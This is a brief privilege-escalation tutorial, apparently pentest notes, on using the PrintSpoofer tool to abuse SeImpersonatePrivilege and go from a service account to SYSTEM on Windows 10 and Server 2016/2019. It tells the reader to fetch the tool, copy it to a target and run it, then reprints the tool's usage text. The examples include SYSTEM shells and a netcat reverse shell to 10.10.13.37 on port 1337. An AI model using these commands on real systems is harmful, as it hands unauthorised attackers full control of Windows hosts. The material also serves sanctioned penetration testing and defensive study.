From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
If you have visual studio you can clone and build PrintSpoofer from the GitHub Repo
git clone firstname.lastname@example.org:itm4n/PrintSpoofer.git
If not you can download the latest pre-built version from https://github.com/itm4n/PrintSpoofer/releases/latest.
Once you have a copy of the executable use your preferred to copy over to your target and then run
PrintSpoofer v0.1 (by @itm4n) Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser() Arguments: -c <CMD> Execute the command *CMD* -i Interact with the new process in the current command prompt (default is non-interactive) -d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta) -h That's me :) Examples: - Run PowerShell as SYSTEM in the current console PrintSpoofer.exe -i -c powershell.exe - Spawn a SYSTEM command prompt on the desktop of the session 1 PrintSpoofer.exe -d 1 -c cmd.exe - Get a SYSTEM reverse shell PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"